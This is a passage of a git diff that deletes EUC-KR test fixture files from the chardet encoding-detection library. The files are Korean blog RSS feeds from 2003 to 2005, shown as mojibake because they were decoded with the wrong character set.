height="574" /> <br /> -<br /> -............<br /> -<br /> -ַַֿֿ.<br /> -<br /> -ְו¹®ְַ ±ְ» ½ב³ץ°ם ´½ֳ ְ׀¾מ÷¸´ֿ ³¹« ¿ל½ְ´.<br /> -<br /> -¹«½¼¸»ְּ ´ץ ַ¿הַׂ±מ.<br /> -<br /> -ֳײ°ם´.<br /> -<br /> -¿µָ­°¡ ½ְֳַֿ´ֲ ¼ר°£ ¹ת½ב ¿£µשְ» µ־·ֱ¿צַ´. - - -iriver boy -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P244 -<b>³­ ¾ֶ¹«ְ¸ר¾ר½ְ´ֿ´</b><br /> -<br /> -¾מֳ³±¸´ֿ ¾ר´ֲ »ח°ְַַ ֱ¾°בְ÷ °ב±¹ ¾ְֶּ¸®¹צֳרְַ ÷¸»ףְ¸·־ ¸¶¹«¸® µַ´ֲ ÷׀ְ§±ג´. »ח°ְַַ °ז°ת¿ֽ °ב°ת¸¦ ³ץ°ם ְּ·¯ִפ ְת·¯ִפ ¸»µµ ¸¹ֱצ¸¸, ְּ ¼ׂ³גְַ ¸נ½ְְּ ±׳¸® ³¸¼³°װ ´ְ²¸ֱצֱצ ¾´ֲ°ַ ¾ֶ¸¶ ³×µµ ³×ְּ°¡ ¸װ¾מ¼­ְֿ±מ? ֱ₪µµְַ ֲקְּ°¡ ְײ´ »׃ְֱּצ, ְת·± ¹«°³³הְַ ¸נ½ְְ÷ ±÷´כ ¸»³ג¿¡¼­÷־ֵֽ ֱצ±±מֱצ ½ֹ½ֲֹת°װ ¸¸³×°ן ַ¾ת´. ³²°ת ¾מ¿ן¸®ֱצ ¾´ֲ ¸נ½ְ, ³²ְ» ¹ט·ֱֱַֿצ ¾´ֲ ¸נ½ְ, ְ½ְֵַ ְ¸רְ÷ ְ־ֱ₪ֱַֿצ ¸רַֿ´ֲ ¸נ½ְ, µµ¹«ֱצ ְַּ״ַׂ ¼צ ¾ר´ֲ ֵץֱ₪, ¾הֳ¼°°ְ÷ ֳ¥ְ׃ְ°¡µמµמ. »ח½ַ µׁ·¯÷¸¸י ְת·± °ז¿ל ±׳¸® ¾מ·ֱֶצ ¾°װ ÷¼ ¼צ ְײְ» °ְּֽ´. ´ ְּ °ז¿לֳ³·³ ±״´ְְ¸·־ ִ¡¿לִ£ °ְֽ» ÷¸´ֲ °ְֽ÷ ֱ»ֳ¼·־ ½±ֱצ ¾°ֱצ...<br /> -<br /> -´¸¥ ±׳ ¾מ¶²°ֽ÷¸´µµ, ְת ¾מ¸° ַ׀»‎ְַ ÷־¸נ°¡ ÷ׂ½ײַֿ´. - - -»‎¶׳¸ְֲ÷ ְ¾ק -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P243 -³» ÷ם·־±׳ µ¹÷¸±גµµ °װְ»¸® ַֿ¸י¼­ ´©°¡ ½ֳֵ°ֱצµµ ¾ְ÷ ְ¾קְ» ¸¶ֳֶ´. ¹«¾נ°¡ ¸פµ־ ַׂ ¼צ ְײ´ֲ ְְּֿ ְײ´´ֲ°ַ ֲ ַא÷¹ַׁ ְְֿ׃¿¡ ÷׀¸םַֿ´. °װ´°¡ ³»°¡ ֱס°ֵ¿צ¼­ ַֿ´ֲ ְְּֿ´ֿ ´ץ¿ם ±׳·¯ַׂ ֵ׳ֱצ.<br /> -<br /> -ְּ°ְֽת°ֽ ¸®´÷¾ףְ» ְ§ַׁ ֱ״÷ס´ֲ ַֿ°ם ְײ´ֲµ¥, ¿צ³« °ַµו·ֱ¾ ַׂ ÷־÷׀ְּ ¸¹¾ֶ¼­ ¾צµ־°¡ ³×ֱצ ¾´ֲ´. ָ³»¾ֱצ. - - -¾מ·ֵַ²ַֿ°װ... -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P242 -<img src="http://console.linuxstudy.pe.kr/blog/images/uploads/bell.JPG" border="0" alt="image" name="image" width="400" height="525" /> <br /> -<br /> -ֲ, ±׳·¸°װ »ץ·־¿מ°ַ°¡? ¿ו¸¸ ¹«ֱצ ¸װ¾ת´ֲµ¥...<br /> -<br /> -µ¿³׳¿¡ ²¿¸¶µיְּ¶ף°ם´ֲ ¿ל¸®µי »׃ְּ¾ת°ם, ְֳ־ֱ¾ְּ ´·ְֱײ´ֲ ֱ‎ְ÷ ¾מ´ְ ³כ÷־÷־ְַ ֱ‎ µ ַׁ°ק...<br /> -<br /> -»ף»ףְּ °¡ֱצ? - - -Brazil A.K.A ¿©ְ־ְַ ְ½¸נ -http://console.linuxstudy.pe.kr/blog/weblog.php?id=P241 -<img src="http://console.linuxstudy.pe.kr/blog/images/uploads/brazil_p.jpg" border="0" alt="image" name="image" width="337" height="475" /> <br /> -<br /> -<b>÷ך¶ףֱת<br /> -6¿ש¿¡ ¸¶ְ½ְַ ֱס°ֵ¿עְ» ֱײ´ֲ °ק<br /> -¿ל¸®´ֲ ְת ָ£¹»צ ´÷ ¾ֶ·¡ ¼­ ְײ¾תֱצ<br /> -¾נֱ¨°¡ ´°¡¿ֳ ³¯µיְ» ¼׃»טְּ¸ח<br /> -ֵ°½÷¸¦ ³×´©°ם ²ְ ²¸¾ָ¾ֱׂצ<br /> -±׳¶§÷־ֵֽ<br /> -³»ְְֿ÷ ¶ַ ´¸¥ ַֿ·ח¿´°ם<br /> -¾ִֶ§ְ÷ ְת ¸ײ¸®¼­ ³×¸¦ ֳ£¾ׂ³׳<br /> -ַׁ °¡ֱצ ÷׀¸םַֿ°װ ָ®½ֵַׂ ¼צ ְײ´ֲ °ְֽ÷<br /> -³»°¡ µ¹¾ֶ°¥ °קְ÷<br /> -°ת°ְֵַ ÷ך¶ףֱתְּ¶ף¿ְ </b><br /> -<br /> -²ֿ ¿ְ·¡ְ, ±׳·¯´ֿ±מ ֱַ׀»‎ ¹«·ְֶּ¾תְ» ¶§ TV¿¡¼­ ְּ ¿µָ­¸¦ ÷ֳ¾ת´. ¾ֶ¸¶ ֱײ¸» ³·¿¡ ַ״ֱײ´ֲ ¹«½¼ ֶ¯¼± ½ֳ¸®ֱמ¿´´ֲµ¥ ¾ױ÷־÷׀ְ÷ ֲַָ½ °ַ³¶ל°ם ÷ֱ¼­ ֱ¦¸סְ» ¾ֻ ¼צ´ֲ ¾ר¾ת°ם, ´¸¸ ֲ µ¶ֶ¯ַׁ ¿µָ­¶ף´ֲ »‎°¢¸¸ ַ¾ת´. ¾ֱֶק±מֱצ ±ג¾ןְּ ³×´ֲ °ֹ ÷¸¸י ²ֿ³× ¸¶ְ½¿¡ µי¾ת´ר °ֽ °°±גµµ ַֿ´. ½ֳ°£ְּ ָך·¯ ´כַ׀±³ 1ַ׀³ג¶§ֲכְּ´ר°¡, ¿µָ­¸¶ְ»ְּ¶ף´ֲ µ¶ֶ¯ַׁ ÷סµנ¿ְ¼¥ְ» ַµ־·־ ÷סֱײ·ש¿µָ­µי¿¡ ´כַׁ »ח¶קµיְַ °½ֹ(¾ֶ´ֿ¸י ³×¸¸ְַ °½ְֹֿ¼צµµ...)ְּ ֶרֱץְַ»¶§ ְּ ¿µָ­ְַ ֱ¦¸סְ» ¾ֻ ¼צ ְײ¾ת´. '¿©ְ־ְַ ְ½¸נ'¶ף´ֲ ¾½ֳ²¸®ַׁ ֱ¦¸ס, °װ´°¡ ¿µ¹® ֱ¦¸סְ÷ ´ץ ¿ה»ףַׁ '÷ך¶ףֱת'. ±׳¸®°ם ¿µָ­¿¡ ´כַׁ °¢ֱ¾ ֲש»ח¿ֽ ָ£ֶעְּ ¾מ¿ל·¯ֱר ÷סֶעµיµµ ַװ²²... ±׳ ֲש»חµי ¶§¹®¿¡ ÷־´ד½÷·¯¿´ֱֲצ ´ח½ֳ ´½ֳ ְּ ¿µָ­¸¦ ÷¸ֱצ´ֲ ¾¾ׂ´. <br /> -<br /> -ֳײ± ַׁ ֵ¬·´¿¡¼­ ְּ ¿µָ­¸¦ ¹°ְַ»¶§, ְ¢ֱצ ÷ֱ¾°±¸³× ַֿ´ֲ ¾מ¶² ¼ק¸ם°°ְ÷ °ְּֽ ´ְ²¸ֱ³´. ֲ ¿ה»ף½÷·´±גµµ ֱַֿצ... ¿¹ְ¿¡ ÷פ¸° µ·ְ» ְֱּ¦¼­¾ ֱײְ־ְ» ֳ£¾ֶ µ¹·ֱֱײ´ֲ ´ְ³¦ְּ¶צ±מ. ¾ֱֶײ »ףִטַֿ¸י¼­µµ »ׁµםַׁ ±ג÷׀ְּ´. ±׳¸®°ם ±׳ ְּ»ףַׁ »ח¶קְּ ·־¹צֶ® µו ´ֿ·־¿´´´ֲ »ץ·־¿מ ¹°µµ ֱס°ּ±ג¸¸ ַֿ´. ¿µָ­¿¡ ´כַׁ ֶעְּ¾ ְ־ֵֽ³ ¿©±גְת±ג¸¸ µׁ·¯÷ֱµµ ֱײ¿ֱ°°ְ÷ ±µיְּ ³־·ֱ ְײְ¸´ֿ ³×±מֱצ ְֱֿ¶ַׂ ַ¿ה´ֲ ¾ר°ֱצ. <br /> -<br /> -¾ֶֿ°, ֱרֱצַֿ°װ ְֿµ¶ְ» ±ַַֿ°ם ½ְֽ÷ ¿µָ­. ִח. ִח. ִח. - - - diff --git a/chardet/tests/EUC-KR/critique.or.kr.xml b/chardet/tests/EUC-KR/critique.or.kr.xml deleted file mode 100644 index 686b643..0000000 --- a/chardet/tests/EUC-KR/critique.or.kr.xml +++ /dev/null @@ -1,118 +0,0 @@ - - - - -Another World! -http://critique.or.kr/tt/index.php -´¼¸ ¹רֲ° °¢¼÷: ֵ¸ְ־ְַ °םֵכ -ko -Thu, 22 Dec 2005 16:02:33 +0900 - -ַד¸®¿לµו ¾׳¼ַ -http://critique.or.kr/tt/index.php?pl=386 -> ± ְֳ¼÷¸±ג]]> -ְג´ד°ת ַך¼ׂ¸® -slowhand -Thu, 22 Dec 2005 15:58:06 +0900 - - -ֶ®·־ֳקֵ°ְַ ²²ְּ µ¿¿µ»ף -http://critique.or.kr/tt/index.php?pl=385 -> ± ְֳ¼÷¸±ג]]> -»¡°£°ם¾חְּ 2 -slowhand -Mon, 19 Dec 2005 21:06:41 +0900 - - -±טֱר¼קְּ ¹±ַ‎¿¡°װ -http://critique.or.kr/tt/index.php?pl=384 -> ± ְֳ¼÷¸±ג]]> -½÷ֵ©·¦ - ±גֵ¸ -slowhand -Mon, 19 Dec 2005 04:40:56 +0900 - - -pair of lovers -http://critique.or.kr/tt/index.php?pl=383 - -»חֱר°ת ±׳¸² - »חֱר -slowhand -Sat, 17 Dec 2005 03:45:09 +0900 - - -ָ²¿ל¼®°ת ֲמ¶ף½ֳ -http://critique.or.kr/tt/index.php?pl=382 -> ± ְֳ¼÷¸±ג]]> -ָ£¸נֶת¸®ֶ¼ִם½÷ -slowhand -Fri, 16 Dec 2005 00:29:22 +0900 - - -÷ֽ»ח¸¶ -http://critique.or.kr/tt/index.php?pl=381 -> ± ְֳ¼÷¸±ג]]> -»חֱר°ת ±׳¸² - »חֱר -slowhand -Mon, 12 Dec 2005 23:56:37 +0900 - - -ֳײ± ¸¸¿¬ַֿ´ֲ ÷ׂ½ֵ ַ³ֱ¶¿¡ ´כַֿ¾... -http://critique.or.kr/tt/index.php?pl=380 -> ± ְֳ¼÷¸±ג]]> -»¡°£°ם¾חְּ 2 -slowhand -Mon, 12 Dec 2005 23:17:12 +0900 - - -ֵ©¸®½÷¸¶½÷ ¼ײ·־»‎ֱ¸ֶָ·ֳ °ב°ת¹ַ¥ -http://critique.or.kr/tt/index.php?pl=379 -> ± ְֳ¼÷¸±ג]]> -ְג´ד°ת ַך¼ׂ¸® -slowhand -Sun, 11 Dec 2005 02:22:37 +0900 - - -°£¸¸¿¡ »חִ¡ -http://critique.or.kr/tt/index.php?pl=378 -> ± ְֳ¼÷¸±ג]]> -ְג´ד°ת ַך¼ׂ¸® -slowhand -Sat, 10 Dec 2005 06:16:40 +0900 - - -¹ּ±¹¹־ ¡®¹±ג¾קֱ₪¼­¡¯ »ח»ףֳײ¾ַ -http://critique.or.kr/tt/index.php?pl=377 -> ± ְֳ¼÷¸±ג]]> -½÷ֵ©·¦ - ÷¸µµ -slowhand -Fri, 09 Dec 2005 20:06:41 +0900 - - - \ No newline at end of file diff --git a/chardet/tests/EUC-KR/epitaph.egloos.com.xml b/chardet/tests/EUC-KR/epitaph.egloos.com.xml deleted file mode 100644 index b0f3de3..0000000 --- a/chardet/tests/EUC-KR/epitaph.egloos.com.xml +++ /dev/null @@ -1,262 +0,0 @@ - - - - - BLACK EGLOO - http://epitaph.egloos.com - ¹ֿ´ֲ´´ֲ °ְֽ÷.. ½־¿מ´´ֲ °ֽ.. - ko - Tue, 17 Jun 2003 09:51:27 GMT - - BLACK EGLOO - http://pds.egloos.com/logo/1/200306/17/14/a0000014.jpg - http://epitaph.egloos.com - 80 - 80 - ¹ֿ´ֲ´´ֲ °ְֽ÷.. ½־¿מ´´ֲ °ֽ.. - - - <![CDATA[ ´ ¶§·ֱֳִ!! ]]> - http://epitaph.egloos.com/1177261 - -
    '¿צְּ~¿צְּ~'
    -
    -±µ¥.. ְּ°ְֵּ°ֵ »ץ·־ »‎±ה [¿¡µנֵֽ ְװ·ֲ]ְ÷ ְְְְּ ¾ָµַ¼­ְ־ֱצ ¾מ·ֶ±¸³×..
    -
    - ]]> -
    - ³×ְַ³«¼­ְו - Fri, 11 Nov 2005 11:22:26 GMT -
    - - <![CDATA[ ¹ֿ´ֲ´´ֲ °ְֽ÷.. ½־¿מ´´ֲ °ֽ.. ]]> - http://epitaph.egloos.com/1171075 - -
    '¼¼»ףְַ ֱ½ֹ¿¡¼­ »ח¶ְ» ¿ִ¡´'¿¡¼­..
    -±״ֱ ֱײְ־°רְַ µ¶¹י..
    -
    -'¹ֿ´ֲ´´ֲ °ְֽ÷.. ½־¿מ´´ֲ °ְּֽ´..'
    -
    -
    -¾מֱ¦ ֲַׁק· ¼תְ» ¸¶½ֳ°ם ֱס°ּ°װ ¾ך±גַֿ°ם³×´ֿ..
    -¹÷°¡ ֱ» ַ®¸®´ֲ °ֽ °°´..
    -
    -³×°°ְ÷ ¼÷°¿£ ְ²¸¸ ¸צ¾ָ¿¡ ½׳¾ֶµ־±ג¸¸ ַֿ´ֿ..
    -¾מ¶² ¹ז¹‎ְ¸·־µח ַ®¾מ³»¾¸¸ ַֿ´ֲ °ְּֽ´..
    -°ט¼׃ °ט¼׃ ½׳¿©¼­ ֶר¹ַֿ±ג ְ¿¡..
    -¹טֳגְ» ַ״¾¸¸ ַֿ´ֲ °ְּֽ´..
    -
    -±µ¥ ¾מֱ¨ ±׳´ֱצ ¹«¸®ַֿ°װ ¼תְ» ¸¶½ֱֳצµµ ¾¾ׂ°ם..
    -²¿ְו ÷־¸®ֱצ ¾°ם ±ג÷׀ ֱֱ°װ ¼תְ» ¸¶½ֵ µם ַׁµ¥..
    -³×¸§ ½÷ֶ®·¹½÷°¡ ֱ» ÷ֱר µםַׁ »ףִטַׁ ±ג÷׀ְּ´..
    -
    -¾ִֶ§¿¡ ¸׃¸® ¾ִֶֶ¼­ ¹ֲק¸¦ ½ב¾ַ´ר °ֽ¸¸ »©°ם´ֲ ¸»ְּ´.. ₪׀_₪׀
    -
    -
    -
    -'¹ֿ´ֲ´´ֲ °ְֽ÷.. ½־¿מ´´ֲ °ֽ..'
    -
    -»מְּ¶ץ ²קְ׃¾רְּ ½־¿צ³×°¡´ֲ °ְּֽ´.
    -¹ְֿ½ְ» ְֱׂצ ¾±ג ְ§ַ״....
    - ]]> -
    - ³×ְַ³«¼­ְו - Fri, 4 Nov 2005 11:47:59 GMT -
    - - <![CDATA[ ¿מ¸םְ» ַַַֿ´.. ]]> - http://epitaph.egloos.com/1169174 - -
    ¿ְ´ֳ ְוְ־¾מ¸¥ְַ ¼צ¼תְּ ְײ¾ת´.
    -°ב°ת´ֲ ¾ֱֶק ¸נ¸£°ֱצ¸¸..
    -¹«»חָק ְ ¸¶ִ¡½ֵ µם ַֿ´.
    -»¡¸® ¿ִֿטµַ½ֳ±ז ¹¶ף¸ח..
    -
    -±׳³×ְת³× µ¥½÷ֶ¼³׳ְּ¼ַµµ ¾ֶ´ֿ°ם ¸»ְֱּצ..
    -ַֿ´ֳµµ ³¹«ַֿ´ ½ֽ´.
    -
    -¿ֳ ַַׁ״ ֱ₪¸» ¸¹ְ÷ °¡ֱ·µיְּ ¾ֶֶֽ´..
    -¾ח°¡¿¡¼­ ¾ָ¾ֶֶֽ´ר »ח¶קְ÷ ְֱּ¦ ¾ֶ¹צֱצ»׃ְ־°¡;;
    -¾ֶ¹צֱצ¸¸ְּ¶ףµµ ¾ֱֱֶַצ ¸¶½ֳ°ם ¹«»חָק ֱצ³×°¡½ֳ±ז ¹¶ץ´..
    -
    -
    -'¿מ¸םµְ© ÷־µתַפ ְּ°³»¸®¶ף~!'
    -¶ף°ם ¸»ַֿ°ם ½ֱֽצ¸¸..
    -
    -¸¶ְ½¼׃ְ¸·׀ ְת·¸°װ..
    -ָ׳~ָ׳~ ַַַ״°¬ְ½ ½ֽ´....
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Wed, 2 Nov 2005 09:58:17 GMT -
    - - <![CDATA[ ֱ»ֳ³·³ ַל¾מ³×¿ְֱצ ¸רַֿ´ֲ °¡¿מµ¥.. ]]> - http://epitaph.egloos.com/1169170 - -
    °¡ְ»¶§¹®ְּ¶ף ֱַׂצ..
    -½½·³ֱַ¶ף ֱַׂצ..
    -¿ןֱץְּ¶ף ֱַׂצ..
    -
    -ְּ°ֽ ְת°ֽ °®´ ÷ְּ¸י ±׳¸¸ְּ±ה ֱַֿצ¸¸..
    -¸נµ־ ÷¯¸ם°°¾ֶ ÷¸¿© ¿״ֱצ ½ָ´..
    -
    -¿©ֶ° ±׳°ְּֽ ¹«¾שְּµח °£¿¡ ֱ»ֳ³·³ ַל¾מ³×¿ְֱת ¸רַֿ°ם ְײ´.
    -
    -¼ױְ» ³»¹׀¾מֱײ´ֲ »ח¶ַֿ´ֲ ְּµµ ְײ°ם..
    -³×¸¦ °ֱֶ₪ַ״ֱײ´ֲ ְּµיµµ ְײֱצ¸¸..
    -
    -¿©±ג¼­ ÷ֱ®³×¿ְ·ֱ¸י ¿×½ֳ..
    -±׳°ְּֽ ¹µו½ֳ '³×'ְֱּצ ¾ְ¸¸י ¾ָµַ´ֲ °ְּֽ´.
    -
    -'³×'ְַ ¼ױְ» ְג°ם..
    -'³×'¸¦ ²ר¾מ ¿ֳ·ֱ¾¸¸ ַֿ´ֲ °ְּֽ´.
    - ]]> -
    - ³×ְַ³«¼­ְו - Wed, 2 Nov 2005 09:49:57 GMT -
    - - <![CDATA[ 'ַׂ ¸»ְ» ֱַֿצ ¸רֱַׂ~¢' ]]> - http://epitaph.egloos.com/1164789 - -
    ¾ך±גַֿ°ם ½ְֽ÷ °ֽµי..
    -±׳·± °ֽµיְּ ³¹«³× ¸¹¾ׂ´ֲµ¥..
    -½ֳ°£ ֱצ³×´ֿ..
    -´ ÷־ֱת ¾ר´ֲ ֱ‏ °°¾ֶ ±׳¸¸µ־°ם ¸¸´..
    -
    -¶ַַׁ..
    -´ח½ֵµיְַ ¸»µיְּ ´ ¿ְַ¸´ֿ..
    -´ץ¿ם ÷־ֱת ¾ר¾מ´ֲ ֱ‏ °°´..
    -
    -³×¸¸ ´ץ ֳ¶ףַ״ֱת »׃..
    -
    -¹ת½ב ¸מֱײֲ° ְּ ֱרָכֱֵ ¼׃¿¡¼­ ַל¾מ³×¿ְֱת ¸רַֿ´ֲ °ֹ±מ....
    - ]]> -
    - ³×ְַ³«¼­ְו - Fri, 28 Oct 2005 11:14:43 GMT -
    - - <![CDATA[ ¿¼ױ, ¿ְ¸¥¼ױ ]]> - http://epitaph.egloos.com/1143862 - -
    °ב±¹ ´ ¶ָ°°ְ÷ °ְּֽ´..
    -÷¯ַֿ±ג ְְַ ¸נ½ְµµ..
    -÷¯ַׁ ְִַָ ¸נ½ְµµ..
    -°ב±¹ ַֿ³×ְַ ¸נ½ְְ־µ¥..
    -
    -
    -±׳³×ְת³×..
    -³¯ְ÷ ¹ת½ב °¡ְ»·־ ֱ¢¾מµי°ם ְײ´ֲµ¥..
    -¿ײְּ¸® ´ץ¿מ °ְֽ־°¡....
    -
    -´‏´..´ץ¿צ..
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Wed, 5 Oct 2005 13:32:43 GMT -
    - - <![CDATA[ ÷־ֱ¶¸®... ]]> - http://epitaph.egloos.com/1142390 - -
    ֱ¡ֱ¡ ½ֵ°זֱתְְ־ ְ־°£ְּ µַ¾מ°£´..
    -
    -ָ¿ל....
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Tue, 4 Oct 2005 02:58:18 GMT -
    - - <![CDATA[ ִ«¶ף¸ב ַׁ °³... ]]> - http://epitaph.egloos.com/1139326 - -
    ¿ײ ¹°װ µַ¾ת³ִ°ם ¹¯ֱצ¸¶¼¼¿ה..
    -
    -ְתµµ ¸נ¸¥´ה´ֿ´.. ₪׀_₪׀
    -
    -
    -ְֱײ ÷ֻ´ֲ ֶםְֱַ¡ ¾ְֶת¾¾..
    -
    -ִ«¶ף¸ב "ַׁ °³" ְ ¸װ¾ת½ְ´ֿ´. ^^
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Fri, 30 Sep 2005 10:18:16 GMT -
    - - <![CDATA[ µ¿±ג¿¡ ¾מ¶»µח °£¿¡.. ]]> - http://epitaph.egloos.com/1137321 - -
    ³×¿¡°װ ְײ¾מ¼­´ֲ ְְ÷ ¹ט·ְֱּ´..
    -
    -
    -
    -¾נֱ¨°¡÷־ֵֽ ָ¸»ח ¹ ְח¶³ְּ ¾ָ¿¡´ֲ ¹°ְּ ¹ֲכ ´ד±ה ֱ¾ְְִֵּּ ְײ¾ת´.
    -ֳ³ְ½¿£ ´©°¡ ¹°ְ» ¸¶½ֳ°ם ְּ·¸°װ ¹צ·ָ³×.. ַ״¼­..
    -ְח¼צ ¾ר´ »‎°¢ַ¾ת´ֲµ¥...
    -
    -±׳°װ ³¯¸¶´ ְײ´ֲ °ְּֽ¾ת´.
    -
    -±ת²‎ְּ ´ְ÷ ְחֵ׀ְּ ¾ָ¿¡..
    -±ת²‎ַׁ ֱ¾ְִֵּ ¾ָ¿¡..
    -±ת²‎ַׁ ¹°ְּ ¹ֲכ ´ד¾ֱֶ®¼­..
    -
    -ֳ»¼ַֿׂ½ֳ´ֲ ¾ֱֶײ¸׃´ְֿ־µם..
    -
    -
    -¾ֱֶײ¸׃´ֿ²²¼­ ±׳·¸°װ ַֿ½ֵ ְְּ¯´ֲ ¸¹ְ» °ְּֽ´.
    -
    -»ח¶קµיְּ ³²ְ÷ ÷ׂ¾¾¸¦ ²ר ¶§ ¼ױ°¡¶פְ¸·־ ֶ¨° ²¨¼­ ¹´ְּ ֱצְת÷׀ ַ״ֱצ´ֲ °ז¿ל..
    -»ח¶קµיְּ ְח¶³ְּ¿¡ ÷ס÷­¼­ ²ר ¶§ ֱ¦´כ·־ ²פֱצ¸¦ ¾¾ֶ¼­ ÷ְּׂ ÷´ֲ °ז¿ל..
    -»ח¶קµיְּ ְחµµ ֵ׀°ם ִ§µµ ¹ס°ם ַ״¼­ ְח¶³ְּ°¡ ¼ר½ִ°£¿¡ ֱצְת÷׀ ַ״ֱצ´ֲ °ז¿ל.. µמµמ..
    -
    -ֱַֿצ¸¸ ³»°¡ ֳ³ְ½ ÷ְֳ» ¶© ְְ÷ ¹ט·ֱ¶ף°ם »‎°¢ַ´..
    -
    -ֱ¾ְִֵּ ¾ָ¿¡ ¹°ְּ ְײְ¸´ֿ..
    -÷ְׂ» ²ר ¶§ ¼ױ°¡¶פְ¸·־ ֶ¨°¼­ ²פ´°¡ ¼ױְ» µ¨ ¿°·ֱµµ ¾ר°ם..
    -÷ְׂ» ֱ¦´כ·־ ²פ±ג ְ§ַ״ °ט¼׃ ²ֳַ¸¦ ְח¶³ְּ¿¡ ÷ס÷סֱצ ¾¾ֶµµ µַ°ם..
    -ַׁ ¹ר¸¸ ¹°¿¡ ´ד±׳¸י ¼ױ½±°װ ÷ְׂ» ²ר ¼צ ְײְ¸´ֿ..
    -
    -µ¿±ג¾ ¾מ¶»µח °£¿¡..
    -³»°¡ ÷ְֳ» ¶§ ְּ°ְֽ÷ ְְ÷ ¹ט·ֱ¶ף°ם »‎°¢ַ´..
    -
    -¹ט·ֱ¶ץ ±»ְּ ֵ«°ְּֽ ¾ֶ´ֿ¾מµµ ֱֱ´.
    -ֱ¶±¸¸ »‎°¢ַֿ¸י ¼­·־°¡ ¼­·־¿¡°װ ֵ« µµ¿עְּ µֹ ¼צ ְײ´ֲ °ְּֽ´.
    -
    -ֱ₪½ְֵּ ֱ» »ך¶ץַ״¼­ ¸׃¸®¼׃ »‎°¢ְ» ֱ¦´כ·־ ֱ₪¸®ַֿ±ג ָµי±¸³×...
    -
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Wed, 28 Sep 2005 04:29:13 GMT -
    - - <![CDATA[ ¿©±ג´ֲ ֳַׁ‏ ְ§ְװ´ֿ´. ]]> - http://epitaph.egloos.com/1106816 - -
    »‎°¢ְּ ¸¹ְ÷°ֱַצ..
    -
    -»‎°¢ְּ ¾ר´ֲ°ֱַצ..
    - ]]> -
    - ÷ם·¢ְּ¾±ג - Wed, 24 Aug 2005 23:40:18 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/ittrend.egloos.com.xml b/chardet/tests/EUC-KR/ittrend.egloos.com.xml deleted file mode 100644 index 3befae5..0000000 --- a/chardet/tests/EUC-KR/ittrend.egloos.com.xml +++ /dev/null @@ -1,287 +0,0 @@ - - - - - All about IT Trends - http://ittrend.egloos.com - IT ֶ®·»µו ¼׃¿¡¼­ ְ·« ²פֱ‎¾מ³»±ג...°½ֹ÷׀¾´ֲ ְ¯÷סִץֵֽ½÷, ¸ײֶ¼¹ּµנ¾מ, ½÷ֵה¸®ֵ¸µ, VoIP, °ֻ»צ, ¸נ¹ְֿ, ִ¿¹ֲ´ְִֹּֿ¼ַ - ko - Mon, 19 Jul 2004 06:33:23 GMT - - All about IT Trends - http://pds1.egloos.com/logo/1/200510/26/01/b0013701.gif - http://ittrend.egloos.com - 80 - 112 - IT ֶ®·»µו ¼׃¿¡¼­ ְ·« ²פֱ‎¾מ³»±ג...°½ֹ÷׀¾´ֲ ְ¯÷סִץֵֽ½÷, ¸ײֶ¼¹ּµנ¾מ, ½÷ֵה¸®ֵ¸µ, VoIP, °ֻ»צ, ¸נ¹ְֿ, ִ¿¹ֲ´ְִֹּֿ¼ַ - - - <![CDATA[ ±¸± ½÷ֵה¸® ±׳¸®°ם Regulating Search ]]> - http://ittrend.egloos.com/2065977 - - ±¸± ½÷ֵה¸®(The Search)ֳ¥ְ» ְ׀¾ת´רֱצ¶ף Google SIG¿¡ ֶק½÷ֳֶµָ °ֻ»צ°זֱ¦¿¡ ´כַ״ µ¿°¨ַֿ´ֲ ¹°¡ ֵ©´. John Battelle°¡ ¾´ ±¸± ½÷ֵה¸®¿¡´ֲ ½÷ִֵֶקµו ´כַ׀»‎ µ־ ¸םְַ ִֶ¶ץ¸¸ְוַׁ? ָק½÷ֵה¸®¸¦ ְח¹ױ°װ ¿«¾מֱב´´ֲ °ְֽ» ³ׁ¾מ °ֻ»צ¿¡ ´כַׁ ֱ» ´ץ °ֵ½ְְֳ־ °ֱ¡¿¡¼­ ¹¶ף÷¸´ֲ ְ¼¼¸¦ ¿ה±¸ַׁ´. ±׳´ֲ "Database of Intentions"¶ף´ֲ ´¾מ¸¦ ¾נ±ַֿ¸י¼­ °ֻ»צְַ ¹ּ·¡¿¡ ´כַׁ ְ¸ְֱ» ¹אְ÷ ÷־÷׀°ת ¾מµ־¿מ ÷־÷׀ְ» ַװ²² ´·ח°ם ְײ´. ±׳¸®°ם ±׳´ֲ ±¸±ְּ ´÷½÷ ¼­÷ס½÷¸¦ ַֿ¸י¼­ ְּ¹ּ °ֻ»צ ¿ְ¸®ֱצ³־ ָ¸»ח°¡ ¾ֶ´ׁ ¹ּµנ¾מ ָ¸»ח¶ף´ֲ ֱ¡ְ» ÷׀¸םָק ¹אָק°ם ְײ´.
    -
    -÷¸ֵכ ±¹³» ְ־ֵֽ³ ¾ק°ט¿¡ ְײ´ֲ »ח¶קµיְ÷ ֶקֵ׀ »חְֶּ®¸¦ °ֻ»צ ֱ½ְֹּ³ִ ¹ּµנ¾מ ֱ½ְֹּ³ִ·־ ±¸÷׀ַׁ´. ´ח¿¬ ³׳ְּ¹צ¸¦ °ֻ»צ ֶקֵ׀ְּ¶ף ַֿ°ם, ´ְ½ְ÷ ¹ּµנ¾מ ֶקֵ׀ְּ¶ף ַׁ´. (±׳·³ SKִ¿¹ֲ´ְִֹּֿ¼ֱַמ´ֲ 1ְ־ ¹ּµנ¾מ ֶקֵ׀ְּ¶ף°ם ַֿ¸י µַ³×?) ¾ֶ¹«ֶ° °ֻ»צ°ת ¹ּµנ¾מ·־ ±¸÷׀ַֿ´ֲ °ְֽ÷ ¸¶¼£ ¸ֶ·חְַּׁ ¾ך±גַׁ "¹ּµנ¾מ´ֲ ¸¼¼ֱצְּ´."¶ף´ֲ ±׳ְַ °ֱ¡ְ¸·־ ֱ¢±ַׁ´¸י °ֻ»צ°ת ¹ּµנ¾מְַ °ז°ט´ֲ ´ץ¿ם ¸נָ£ַֿ´´ֲ »‎°¢ְּ µח´. ֱן °ֻ»צְ÷ ¿ְָק·ֱ ¹ּµנ¾מְַ ¹ּµנ¾מ·־½ב ¸ֵ¸ ¹ּµנ¾מ¶ף ÷־¸¦ ¼צ ְײ°װ µָ´´ֲ ֱ¡ְּ´.
    -
